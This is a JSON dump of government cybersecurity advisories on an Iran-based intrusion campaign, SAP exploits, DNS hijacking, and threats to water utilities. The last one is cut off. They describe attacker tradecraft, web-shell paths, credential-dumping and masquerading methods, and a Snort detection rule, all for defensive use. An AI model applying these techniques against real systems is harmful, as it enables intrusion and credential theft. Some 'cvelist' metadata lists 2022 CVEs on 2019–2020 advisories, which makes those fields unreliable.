the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902.\n\nAfter gaining initial access to a targeted network, the threat actor obtains administrator-level credentials and installs web shells allowing further entrenchment. After establishing a foothold, the threat actor\u2019s goals appear to be maintaining persistence and exfiltrating data. This threat actor has been observed selling access to compromised network infrastructure in an online hacker forum. Industry reporting indicates that the threat actor operates as a contractor supporting Iranian government interests, but the malicious activity appears to also serve the threat actor\u2019s own financial interests. 
The FBI notes this threat actor has the capability, and likely the intent, to deploy ransomware on victim networks.\n\nCISA and FBI have observed this Iran-based threat actor relying on exploits of remote external services on internet-facing assets to gain initial access to victim networks. The threat actor also relies heavily on open-source and operating system (OS) tooling to conduct operations, such as ngrok; fast reverse proxy (FRP); Lightweight Directory Access Protocol (LDAP) directory browser; as well as web shells known as ChunkyTuna, Tiny, and China Chopper.\n\nTable 1 illustrates some of the common tools this threat actor has used.\n\n_Table 1: Common exploit tools_\n\n| Tool | Detail |\n|---|---|\n| ChunkyTuna web shell | ChunkyTuna allows for chunked transfer encoding hypertext transfer protocol (HTTP) that tunnels Transmission Control Protocol (TCP) streams over HTTP. The web shell allows for reverse connections to a server with the intent to exfiltrate data. |\n| Tiny web shell | Tiny uses Hypertext Preprocessor (PHP) to create a backdoor. It has the capability to allow a threat actor remote access to the system and can also tunnel or route traffic. |\n| China Chopper web shell | China Chopper is a web shell hosted on a web server and is mainly used for web application attacks; it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. |\n| FRPC | FRPC is a modified version of the open-source FRP tool. It allows a system\u2014inside a router or firewall providing Network Address Translation\u2014to provide network access to systems/operators located outside of the victim network. In this case, FRPC was used as a reverse proxy, tunneling Remote Desktop Protocol (RDP) over Transport Layer Security (TLS), giving the threat actor primary persistence. |\n| Chisel | Chisel is a fast TCP tunnel over HTTP and secured via Secure Shell (SSH). 
It is a single executable that includes both client and server. The tool is useful for passing through firewalls, but it can also be used to provide a secure form of communication to an endpoint on a victim network. |\n| ngrok | ngrok is a tool used to expose a local port to the internet. Optionally, tunnels can be secured with TLS. |\n| Nmap | Nmap is used for vulnerability scanning and network discovery. |\n| Angry IP Scanner | Angry IP Scanner is a scanner that can ping a range of Internet Protocol (IP) addresses to check if they are active and can also resolve hostnames, scan ports, etc. |\n| Drupwn | Drupwn is a Python-based tool used to scan for vulnerabilities and exploit CVEs in Drupal devices. |\n\nNotable means of detecting this threat actor:\n\n * CISA and the FBI note that this group makes significant use of ngrok, which may appear as TCP port 443 connections to external cloud-based infrastructure.\n * The threat actor uses FRPC over port 7557.\n * [Malware Analysis Report MAR-10297887-1.v1](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a>) details some of the tools this threat actor used against some victims.\n\nThe following file paths can be used to detect Tiny web shell, ChunkyTuna web shell, or Chisel if a network has been compromised by this attacker exploiting CVE-2019-19781.\n\n * Tiny web shell\n   * `/netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php`\n   * `/netscaler/ns_gui/vpn/images/vpn_ns_gui.php`\n   * `/var/vpn/themes/imgs/tiny.php`\n * ChunkyTuna web shell\n   * `/var/vpn/themes/imgs/debug.php`\n   * `/var/vpn/themes/imgs/include.php`\n   * `/var/vpn/themes/imgs/whatfile`\n * Chisel\n   * `/var/nstmp/chisel`\n\n### MITRE ATT&CK Framework\n\n#### Initial Access\n\nAs indicated in table 2, the threat actor primarily gained initial access by using the publicly available exploit for CVE-2019-19781. 
From there, the threat actor used the Citrix environment to establish a presence on an internal network server.\n\n_Table 2: Initial access techniques_\n\n| ID | Technique/Sub-Technique | Context |\n|---|---|---|\n| [T1190](<https://attack.mitre.org/techniques/T1190/>) | Exploit Public-Facing Application | The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781. The threat actor also exploited CVE-2019-11510, CVE-2019-11539, and CVE-2020-5902. |\n\n#### Execution\n\nAfter gaining initial access, the threat actor began executing scripts, as shown in table 3.\n\n_Table 3: Execution techniques_\n\n| ID | Technique/Sub-Technique | Context |\n|---|---|---|\n| [T1059.001](<https://attack.mitre.org/techniques/T1059/001/>) | Command and Scripting Interpreter: PowerShell | A PowerShell script (`keethief` and `kee.ps1`) was used to access KeePass data. |\n| [T1059.003](<https://attack.mitre.org/techniques/T1059/003/>) | Command and Scripting Interpreter: Windows Command Shell | `cmd.exe` was launched via sticky keys and was likely used as a password changing mechanism. |\n\n#### Persistence\n\nCISA observed the threat actor using the techniques identified in table 4 to establish persistence.\n\n_Table 4: Persistence techniques_\n\n| ID | Technique/Sub-Technique | Context |\n|---|---|---|\n| [T1053.003](<https://attack.mitre.org/techniques/T1053/003/>) | Scheduled Task/Job: Cron | The threat actor loaded a series of scripts to `cron` and ran them for various purposes (mainly to access NetScaler web forms). |\n| [T1053.005](<https://attack.mitre.org/techniques/T1053/005/>) | Scheduled Task/Job: Scheduled Task | The threat actor installed and used FRPC (`frpc.exe`) on both NetScaler and internal devices. The task was named `lpupdate` and the binary was named `svchost`, which was the reverse proxy. 
The threat actor executed this command daily. |\n| [T1505.003](<https://attack.mitre.org/techniques/T1505/003/>) | Server Software Component: Web Shell | The threat actor used several web shells on existing web servers. Both NetScaler and web servers called out for ChunkyTuna. |\n| [T1546.008](<https://attack.mitre.org/techniques/T1546/008/>) | Event Triggered Execution: Accessibility Features | The threat actor used sticky keys (`sethc.exe`) to launch `cmd.exe`. |\n\n#### Privilege Escalation\n\nCISA observed no evidence of direct privilege escalation. The threat actor attained domain administrator credentials on the NetScaler device via exploit and continued to expand credential access on the network.\n\n#### Defense Evasion\n\nCISA observed the threat actor using the techniques identified in table 5 to evade detection.\n\n_Table 5: Defensive evasion techniques_\n\n| ID | Technique/Sub-Technique | Context |\n|---|---|---|\n| [T1027.002](<https://attack.mitre.org/techniques/T1027/002/>) | Obfuscated Files or Information: Software Packing | The threat actor used base64 encoding for payloads on NetScaler during initial access, making the pre-compiled payloads easier to avoid detection. |\n| [T1027.004](<https://attack.mitre.org/techniques/T1027/004/>) | Obfuscated Files or Information: Compile After Delivery | The threat actor used base64 encoding schemes on distributed (uncompiled) scripts and files to avoid detection. |\n| [T1036.004](<https://attack.mitre.org/techniques/T1036/004/>) | Masquerading: Masquerade Task or Service | The threat actor used FRPC (`frpc.exe`) daily as a reverse proxy, tunneling RDP over TLS. The FRPC (`frpc.exe`) task name was `lpupdate` and ran out of the Input Method Editor (IME) directory. In other events, the threat actor has been observed hiding activity via ngrok. |
\n| [T1036.005](<https://attack.mitre.org/techniques/T1036/005/>) | Masquerading: Match Legitimate Name or Location | The FRPC (`frpc.exe`) binary name was `svchost`, and the configuration file was `dllhost.dll`, attempting to masquerade as a legitimate Dynamic Link Library. |\n| [T1070.004](<https://attack.mitre.org/techniques/T1070/004/>) | Indicator Removal on Host: File Deletion | To minimize their footprint, the threat actor ran `./httpd-nscache_clean` every 30 minutes, which cleaned up files on the NetScaler device. |\n\n#### Credential Access\n\nCISA observed the threat actor using the techniques identified in table 6 to further their credential access.\n\n_Table 6: Credential access techniques_\n\n| ID | Technique/Sub-Technique | Context |\n|---|---|---|\n| [T1003.001](<https://attack.mitre.org/techniques/T1003/001/>) | OS Credential Dumping: LSASS Memory | The threat actor used `procdump` to dump process memory from the Local Security Authority Subsystem Service (LSASS). |\n| [T1003.003](<https://attack.mitre.org/techniques/T1003/003/>) | OS Credential Dumping: Windows NT Directory Services (NTDS) | The threat actor used Volume Shadow Copy to access credential information from the NTDS file. |\n| [T1552.001](<https://attack.mitre.org/techniques/T1552/001/>) | Unsecured Credentials: Credentials in Files | The threat actor accessed files containing valid credentials. |\n| [T1555](<https://attack.mitre.org/techniques/T1555/>) | Credentials from Password Stores | The threat actor accessed a `KeePass` database multiple times and used the `kee.ps1` PowerShell script. |\n| [T1558](<https://attack.mitre.org/techniques/T1558/>) | Steal or Forge Kerberos Tickets | The threat actor conducted a directory traversal attack by creating files and exfiltrating a Kerberos ticket on a NetScaler device. The threat actor was then able to gain access to a domain account. |
\n\n#### Discovery\n\nCISA observed the threat actor using the techniques identified in table 7 to learn more about the victim environments.\n\n_Table 7: Discovery techniques_\n\n| ID | Technique/Sub-Technique | Context |\n|---|---|---|\n| [T1018](<https://attack.mitre.org/techniques/T1018/>) | Remote System Discovery | The threat actor used Angry IP Scanner to detect remote systems. |\n| [T1083](<https://attack.mitre.org/techniques/T1083/>) | File and Directory Discovery | The threat actor used WizTree to obtain network files and directory listings. |\n| [T1087](<https://attack.mitre.org/techniques/T1087/>) | Account Discovery | The threat actor accessed `ntuser.dat` and `UserClass.dat` and used Softerra LDAP Browser to browse documentation for service accounts. |\n| [T1217](<https://attack.mitre.org/techniques/T1217/>) | Browser Bookmark Discovery | The threat actor used Google Chrome bookmarks to find internal resources and assets. |\n\n#### Lateral Movement\n\nCISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment.\n\n_Table 8: Lateral movement techniques_\n\n| ID | Technique/Sub-Technique | Context |\n|---|---|---|\n| [T1021](<https://attack.mitre.org/techniques/T1021/>) | Remote Services | The threat actor used RDP with valid account credentials for lateral movement in the environment. |\n| [T1021.001](<https://attack.mitre.org/techniques/T1021/001/>) | Remote Services: Remote Desktop Protocol | The threat actor used RDP to log in and then conduct lateral movement. |\n| [T1021.002](<https://attack.mitre.org/techniques/T1021/002/>) | Remote Services: SMB/Windows Admin Shares | The threat actor used PsExec and PSEXECSVC pervasively on several hosts. The threat actor was also observed using a valid account to access SMB shares. |
\n| [T1021.004](<https://attack.mitre.org/techniques/T1021/004/>) | Remote Services: SSH | The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink were used for encrypted sessions in the system registry hive. |\n| [T1021.005](<https://attack.mitre.org/techniques/T1021/005/>) | Remote Services: Virtual Network Computing (VNC) | The threat actor installed TightVNC server and client pervasively on compromised servers and endpoints in the network environment as a lateral movement tool. |\n| [T1563.002](<https://attack.mitre.org/techniques/T1563/002/>) | Remote Service Session Hijacking: RDP Hijacking | The threat actor likely hijacked a legitimate RDP session to move laterally within the network environment. |\n\n#### Collection\n\nCISA observed the threat actor using the techniques identified in table 9 for collection within the victim environment.\n\n_Table 9: Collection techniques_\n\n| ID | Technique/Sub-Technique | Context |\n|---|---|---|\n| [T1005](<https://attack.mitre.org/techniques/T1005/>) | Data from Local System | The threat actor searched local system sources to access sensitive documents. |\n| [T1039](<https://attack.mitre.org/techniques/T1039/>) | Data from Network Shared Drive | The threat actor searched network shares to access sensitive documents. |\n| [T1213](<https://attack.mitre.org/techniques/T1213/>) | Data from Information Repositories | The threat actor accessed victim security/IT monitoring environments, Microsoft Teams, etc., to mine valuable information. |\n| [T1530](<https://attack.mitre.org/techniques/T1530/>) | Data from Cloud Storage Object | The threat actor obtained files from the victim cloud storage instances. |\n| [T1560.001](<https://attack.mitre.org/techniques/T1560/001/>) | Archive Collected Data: Archive via Utility | The threat actor used 7-Zip to archive data. |
\n\n#### Command and Control\n\nCISA observed the threat actor using the techniques identified in table 10 for command and control (C2).\n\n_Table 10: Command and control techniques_\n\n| ID | Technique/Sub-Technique | Context |\n|---|---|---|\n| [T1071.001](<https://attack.mitre.org/techniques/T1071/001/>) | Application Layer Protocol: Web Protocols | The threat actor used various web mechanisms and protocols, including the web shells listed in table 1. |\n| [T1105](<https://attack.mitre.org/techniques/T1105/>) | Ingress Tool Transfer | The threat actor downloaded tools such as PsExec directly to endpoints and downloaded web shells and scripts to NetScaler in base64-encoded schemes. |\n| [T1572](<https://attack.mitre.org/techniques/T1572/>) | Protocol Tunneling | The threat actor used `FRPC.exe` to tunnel RDP over port 443. The threat actor has also been observed using ngrok for tunneling. |\n\n#### Exfiltration\n\nCISA currently has no evidence of data exfiltration from this threat actor but assesses that it was likely due to the use of 7-Zip and viewing of sensitive documents.\n\n### Mitigations\n\n#### Recommendations\n\nCISA and FBI recommend implementing the following recommendations.\n\n * If your organization has not patched for the Citrix CVE-2019-19781 vulnerability, and a compromise is suspected, follow the recommendations in CISA Alert [AA20-031A](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>).\n * This threat actor has been observed targeting other CVEs mentioned in this report; follow the recommendations in the CISA resources provided below.\n * If using Windows Active Directory and compromise is suspected, conduct remediation of the compromised Windows Active Directory forest. 
\n * If compromised, rebuild/reimage compromised NetScaler devices.\n * Routinely audit configuration and patch management programs.\n * Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).\n * Implement multi-factor authentication, especially for privileged accounts.\n * Use separate administrative accounts on separate administration workstations.\n * Implement the principle of least privilege on data access.\n * Secure RDP and other remote access solutions using multifactor authentication and \u201cjump boxes\u201d for access.\n * Deploy endpoint defense tools on all endpoints; ensure they work and are up to date.\n * Keep software up to date.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:%20CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. 
To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:%20Central@cisa.dhs.gov>).\n\n### Resources\n\n[CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>) \n[CISA Alert AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>) \n[CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>) \n[CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>) \n[CISA Security Tip: Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nSeptember 15, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T12:00:00", "type": "ics", "title": "Iran-Based Threat Actor Exploits VPN Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-11539", "CVE-2019-19781", "CVE-2020-5902", "CVE-2022-42475", 
"CVE-2022-47966"], "modified": "2020-09-15T12:00:00", "id": "AA20-259A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-259a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T08:01:09", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is issuing this activity alert in response to recently disclosed exploits that target unsecure configurations of SAP components. [[1](<https://github.com/comaeio/OPCDE/tree/master/2019/Emirates/\\(SAP\\)%20Gateway%20to%20Heaven%20-%20Dmitry%20Chastuhin%2C%20Mathieu%20Geli>)]\n\n### Technical Details\n\nA presentation at the April 2019 Operation for Community Development and Empowerment (OPCDE) cybersecurity conference describes SAP systems with unsecure configurations exposed to the internet. Typically, SAP systems are not intended to be exposed to the internet as it is an untrusted network. Malicious cyber actors can attack and compromise these unsecure systems with publicly available exploit tools, termed \u201c10KBLAZE.\u201d The presentation details the new exploit tools and reports on systems exposed to the internet.\n\n#### SAP Gateway ACL\n\nThe SAP Gateway allows non-SAP applications to communicate with SAP applications. If SAP Gateway access control lists (ACLs) are not configured properly (e.g., gw/acl_mode = 0), anonymous users can run operating system (OS) commands.[[2](<https://wiki.scn.sap.com/wiki/display/SI/Gateway+Access+Control+Lists>)] According to the OPCDE presentation, about 900 U.S. internet-facing systems were detected in this vulnerable condition.\n\n#### SAP Router secinfo\n\nThe SAP router is a program that helps connect SAP systems with external networks. The default `secinfo` configuration for a SAP Gateway allows any internal host to run OS commands anonymously. 
If an attacker can access a misconfigured SAP router, the router can act as an internal host and proxy the attacker\u2019s requests, which may result in remote code execution.\n\nAccording to the OPCDE presentation, 1,181 SAP routers were exposed to the internet. It is unclear if the exposed systems were confirmed to be vulnerable or were simply running the SAP router service.\n\n#### SAP Message Server\n\nSAP Message Servers act as brokers between Application Servers (AS). By default, Message Servers listen on port 39XX and have no authentication. If an attacker can access a Message Server, they can redirect and/or execute legitimate man-in-the-middle (MITM) requests, thereby gaining credentials. Those credentials can be used to execute code or operations on AS servers (assuming the attacker can reach them). According to the OPCDE presentation, there are 693 Message Servers exposed to the internet in the United States. The Message Server ACL must be protected by the customer in all releases.\n\n#### Signature\n\nCISA worked with security researchers from Onapsis Inc.[[3](<https://www.onapsis.com/>)] to develop the following Snort signature that can be used to detect the exploits:\n\n```\nalert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:\"10KBLAZE SAP Exploit execute attempt\"; flow:established,to_server; content:\"|06 cb 03|\"; offset:4; depth:3; content:\"SAPXPG_START_XPG\"; nocase; distance:0; fast_pattern; content:\"37D581E3889AF16DA00A000C290099D0001\"; nocase; distance:0; content:\"extprog\"; nocase; distance:0; sid:1; rev:1;)\n```\n\n### Mitigations\n\nCISA recommends administrators of SAP systems implement the following to mitigate the vulnerabilities included in the OPCDE presentation:\n\n * Ensure a secure configuration of their SAP landscape.\n * Restrict access to SAP Message Server. \n * Review SAP Notes 1408081 and 821875. 
Restrict authorized hosts via ACL files on Gateways (`gw/acl_mode` and `secinfo`) and Message Servers (`ms/acl_info`).[[4](<https://launchpad.support.sap.com/#/notes/1408081>)], [[5](<https://launchpad.support.sap.com/#/notes/821875>)]\n * Review SAP Note 1421005. Split the Message Server internal and public ports: `rdisp/msserv=0 rdisp/msserv_internal=39NN`. [[6](<https://launchpad.support.sap.com/#/notes/1421005>)]\n * Restrict access to the Message Server internal port (`tcp/39NN`) so that it is not reachable from clients or the internet.\n * Enable Secure Network Communications (SNC) for clients.\n * Scan for exposed SAP components. \n * Ensure that SAP components are not exposed to the internet.\n * Remove or secure any exposed SAP components.\n\n### References\n\n[[1] Comae Technologies: Operation for Community Development and Empowerment (OPCDE) Cybersecurity Conference Materials](<https://github.com/comaeio/OPCDE/tree/master/2019/Emirates/\\(SAP\\)%20Gateway%20to%20Heaven%20-%20Dmitry%20Chastuhin%2C%20Mathieu%20Geli>)\n\n[[2] SAP: Gateway Access Control Lists](<https://wiki.scn.sap.com/wiki/display/SI/Gateway+Access+Control+Lists>)\n\n[[3] Onapsis Inc. 
website ](<https://www.onapsis.com>)\n\n[[4] SAP Note 1408081 ](<https://launchpad.support.sap.com/#/notes/1408081>)\n\n[[5] SAP Note 821875 ](<https://launchpad.support.sap.com/#/notes/821875>)\n\n[[6] SAP Note 1421005 ](<https://launchpad.support.sap.com/#/notes/1421005>)\n\n### Revisions\n\nMay 2, 2019: Initial version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-03T12:00:00", "type": "ics", "title": "New Exploits for Unsecure SAP Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42475", "CVE-2022-47966"], "modified": "2019-05-03T12:00:00", "id": "AA19-122A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-122a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T08:02:41", "description": "### Summary\n\nThe National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), is aware of a global Domain Name System (DNS) infrastructure hijacking campaign. 
Using compromised credentials, an attacker can modify the location to which an organization\u2019s domain name resources resolve. This enables the attacker to redirect user traffic to attacker-controlled infrastructure and obtain valid encryption certificates for an organization\u2019s domain names, enabling man-in-the-middle attacks.\n\nSee the following links for downloadable copies of open-source indicators of compromise (IOCs) from the sources listed in the References section below:\n\n * IOCs (.csv)\n * IOCs (.stix)\n\nNote: these files were last updated February 13, 2019, to remove the following three non-malicious IP addresses:\n\n * 107.161.23.204\n * 192.161.187.200\n * 209.141.38.71\n\n### Technical Details\n\nUsing the following techniques, attackers have redirected and intercepted web and mail traffic, and could do so for other networked services.\n\n 1. The attacker begins by compromising user credentials, or obtaining them through alternate means, of an account that can make changes to DNS records.\n 2. Next, the attacker alters DNS records, like Address (A), Mail Exchanger (MX), or Name Server (NS) records, replacing the legitimate address of a service with an address the attacker controls. This enables them to direct user traffic to their own infrastructure for manipulation or inspection before passing it on to the legitimate service, should they choose. This creates a risk that persists beyond the period of traffic redirection.\n 3. Because the attacker can set DNS record values, they can also obtain valid encryption certificates for an organization\u2019s domain names. This allows the redirected traffic to be decrypted, exposing any user-submitted data. 
Since the certificate is valid for the domain, end users receive no error warnings.\n\n### Mitigations\n\nNCCIC recommends the following best practices to help safeguard networks against this threat:\n\n * Update the passwords for all accounts that can change organizations\u2019 DNS records.\n * Implement multifactor authentication on domain registrar accounts, or on other systems used to modify DNS records.\n * Audit public DNS records to verify they are resolving to the intended location.\n * Search for encryption certificates related to domains and revoke any fraudulently requested certificates.\n\n### References\n\n[Cisco Talos blog: DNSpionage Campaign Targets Middle East ](<https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html>)\n\n[CERT-OPMD blog: [DNSPIONAGE] \u2013 Focus on internal actions](<https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions>)\n\n[FireEye blog: Global DNS Hijacking Campaign: DNS Record Manipulation at Scale ](<https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html>)\n\n[Crowdstrike blog: Widespread DNS Hijacking Activity Targets Multiple Sectors](<https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors>)\n\n### Revisions\n\nJanuary 24, 2019: Initial version|February 6, 2019: Updated IOCs, added Crowdstrike blog|February 13, 2019: Updated IOCs\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-13T12:00:00", "type": "ics", "title": "DNS Infrastructure Hijacking Campaign", "bulletinFamily": "info", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42475", "CVE-2022-47966"], "modified": "2019-02-13T12:00:00", "id": "AA19-024A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-024a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:01:58", "description": "### Summary\n\n_**Immediate Actions WWS Facilities Can Take Now to Protect Against Malicious Cyber Activity**_ \n_\u2022 Do not click on [suspicious links](<https://us-cert.cisa.gov/ncas/tips/ST04-014>)._ \n_\u2022 If you use [RDP](<https://www.ic3.gov/Media/Y2018/PSA180927>), secure and monitor it._ \n_\u2022 Use [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>)._ \n_\u2022 Use [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>)._\n\n_**Note:** This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, version 9. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v9/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThis joint advisory is the result of analytic efforts between the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Environmental Protection Agency (EPA), and the National Security Agency (NSA) to highlight ongoing malicious cyber activity\u2014by both known and unknown actors\u2014targeting the information technology (IT) and operational technology (OT) networks, systems, and devices of [U.S. 
Water and Wastewater Systems (WWS) Sector facilities](<https://www.cisa.gov/water-and-wastewater-systems-sector>). This activity\u2014which includes attempts to compromise system integrity via unauthorized access\u2014threatens the ability of WWS facilities to provide clean, potable water to, and effectively manage the wastewater of, their communities. **Note:** although cyber threats across [critical infrastructure sectors](<https://www.cisa.gov/critical-infrastructure-sectors>) are increasing, this advisory does not intend to indicate greater targeting of the WWS Sector versus others.\n\nTo secure WWS facilities\u2014including Department of Defense (DoD) water treatment facilities in the United States and abroad\u2014against the TTPs listed below, CISA, FBI, EPA, and NSA strongly urge organizations to implement the measures described in the Recommended Mitigations section of this advisory.\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Threat Overview\n\n#### Tactics, Techniques, and Procedures\n\nWWS facilities may be vulnerable to the following common tactics, techniques, and procedures (TTPs) used by threat actors to compromise IT and OT networks, systems, and devices.\n\n * Spearphishing personnel to deliver malicious payloads, including ransomware [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566/>)]. \n * Spearphishing is one of the most prevalent techniques used for initial access to IT networks. Personnel and their potential lack of cyber awareness are a vulnerability within an organization. 
Personnel may open malicious attachments or links to execute malicious payloads contained in emails from threat actors that have successfully bypassed email filtering controls.\n * When organizations integrate IT with OT systems, attackers can gain access\u2014either purposefully or inadvertently\u2014to OT assets after the IT network has been compromised through spearphishing and other techniques.\n * Exploitation of internet-connected services and applications that enable remote access to WWS networks [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210/>)]. \n * For example, threat actors can exploit a Remote Desktop Protocol (RDP) that is insecurely connected to the internet to infect a network with ransomware. If the RDP is used for process control equipment, the attacker could also compromise WWS operations. Note: the increased use of remote operations due to the COVID-19 pandemic has likely increased the prevalence of weaknesses associated with remote access.\n * Exploitation of unsupported or outdated operating systems and software. \n * Threat actors likely seek to take advantage of perceived weaknesses among organizations that either do not have\u2014or choose not to prioritize\u2014resources for IT/OT infrastructure modernization. WWS facilities tend to allocate resources to physical infrastructure in need of replacement or repair (e.g., pipes) rather than IT/OT infrastructure.\n * The fact that WWS facilities are inconsistently resourced municipal systems\u2014not all of which have the resources to employ consistently high cybersecurity standards\u2014may contribute to the use of unsupported or outdated operating systems and software.\n * Exploitation of control system devices with vulnerable firmware versions. \n * WWS systems commonly use outdated control system devices or firmware versions, which expose WWS networks to publicly accessible and remotely executable vulnerabilities. 
Successful compromise of these devices may lead to loss of system control, denial of service, or loss of sensitive data [[T0827](<https://collaborate.mitre.org/attackics/index.php/Technique/T0827>)].\n\n#### WWS Sector Cyber Intrusions\n\nCyber intrusions targeting U.S. WWS facilities highlight vulnerabilities associated with the following threats:\n\n * Insider threats, from current or former employees who maintain improperly active credentials\n * Ransomware attacks\n\nWWS Sector cyber intrusions from 2019 to early 2021 include:\n\n * In August 2021, malicious cyber actors used Ghost variant ransomware against a California-based WWS facility. The ransomware variant had been in the system for about a month and was discovered when three supervisory control and data acquisition (SCADA) servers displayed a ransomware message.\n * In July 2021, cyber actors used remote access to introduce ZuCaNo ransomware onto a Maine-based WWS facility\u2019s wastewater SCADA computer. The treatment system was run manually until the SCADA computer was restored using local control and more frequent operator rounds.\n * In March 2021, cyber actors used an unknown ransomware variant against a Nevada-based WWS facility. The ransomware affected the victim\u2019s SCADA system and backup systems. 
